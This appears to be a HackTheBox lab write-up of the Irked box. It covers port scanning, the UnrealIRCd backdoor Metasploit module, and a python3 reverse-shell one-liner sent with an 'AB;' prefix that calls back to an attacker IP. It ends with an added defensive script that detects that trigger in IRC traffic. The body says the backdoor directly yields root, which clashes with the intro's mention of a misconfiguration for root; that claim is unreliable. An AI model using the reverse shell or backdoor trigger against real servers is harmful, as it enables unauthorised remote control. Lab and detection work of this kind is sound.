An easy Linux box from HackTheBox, exploiting a CVE on an IRC server for initial access and a misconfiguration for root.

Recon

Running an nmap scan of all ports:

Nmap scan report for 10.10.10.117  
Host is up (0.020s latency).  
Not shown: 65528 closed tcp ports (conn-refused)  
PORT      STATE SERVICE VERSION  
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)  
| ssh-hostkey:    
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)  
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)  
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)  
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)  
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))  
|_http-title: Site doesn't have a title (text/html).  
|_http-server-header: Apache/2.4.10 (Debian)  
111/tcp   open  rpcbind 2-4 (RPC #100000)  
| rpcinfo:    
|   program version    port/proto  service  
|   100000  2,3,4        111/tcp   rpcbind  
|   100000  2,3,4        111/udp   rpcbind  
|   100000  3,4          111/tcp6  rpcbind  
|   100000  3,4          111/udp6  rpcbind  
|   100024  1          48245/udp6  status  
|   100024  1          50084/udp   status  
|   100024  1          50281/tcp6  status  
|_  100024  1          53340/tcp   status  
6697/tcp  open  irc     UnrealIRCd  
8067/tcp  open  irc     UnrealIRCd  
53340/tcp open  status  1 (RPC #100024)  
65534/tcp open  irc     UnrealIRCd (Admin email djmardov@irked.htb)  
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There's an HTTP server on port 80, but it's just an image of a smiley :)

Can connect to the IRC (chat protocol) port 6697 with HexChat, but there's nothing in there.

Now just run searchsploit for UnrealIRCd, which finds a couple of scripts.

Exploitation

Ignoring the Windows ones, look at the Linux command execution exploit:

searchsploit -x exploits/linux/remote/16922.rb
def exploit
  connect

  print_status("Connected to #{rhost}:#{rport}...")
  banner = sock.get_once(-1, 30)
  banner.to_s.split("\n").each do |line|
    print_line("    #{line}")
  end

  print_status("Sending backdoor command...")
  sock.put("AB;" + payload.encoded + "\n")

  handler
  disconnect
end

It seems to just send AB;{command} and the server executes the command, so connect to the IRC port with netcat and type in the payload:

nc 10.10.10.117 6697
AB;python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And get root!
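From the defender's side, the trigger described above is easy to spot in IRC traffic: the backdoor fires only when a client line begins with AB;. The following detection is an added example, not part of the original writeup or of the exploit module; the log format ("src > dst  payload") and the sample lines are constructed for illustration.

```python
import re
from typing import List, NamedTuple

# Constructed sample of client-to-server IRC lines, as a sensor or proxy
# might record them ("src > dst  payload"). Not from the original page.
SAMPLE_IRC_LINES = [
    "10.10.14.3:51234 > 10.10.10.117:6697  NICK alice",
    "10.10.14.3:51234 > 10.10.10.117:6697  USER alice 0 * :alice",
    "10.10.14.3:51234 > 10.10.10.117:6697  PRIVMSG #general :hello AB;id",
    "10.10.14.3:51240 > 10.10.10.117:6697  AB;id",
    "10.10.14.3:51241 > 10.10.10.117:8067  AB;python3 -c 'print(1)'",
]

LINE_RE = re.compile(r"^(?P<src>\S+) > (?P<dst>\S+)\s+(?P<payload>.*)$")
TRIGGER = "AB;"  # the prefix the writeup's exploit sends before the command


class Alert(NamedTuple):
    src: str
    dst: str
    command: str


def find_backdoor_triggers(lines: List[str]) -> List[Alert]:
    """Return an Alert for every client line whose payload starts with the
    backdoor trigger. Only the start of the payload counts: the same string
    inside a PRIVMSG body is ordinary chat text and must not alert."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a traffic line in the assumed format
        payload = m.group("payload")
        if payload.startswith(TRIGGER):
            alerts.append(Alert(m.group("src"), m.group("dst"),
                                payload[len(TRIGGER):]))
    return alerts


if __name__ == "__main__":
    for a in find_backdoor_triggers(SAMPLE_IRC_LINES):
        print(f"backdoor trigger from {a.src} to {a.dst}: {a.command!r}")
```

Both IRC ports the scan found (6697 and 8067, plus 65534) are served by the same daemon, so the check applies to every one of them, not just the port used above.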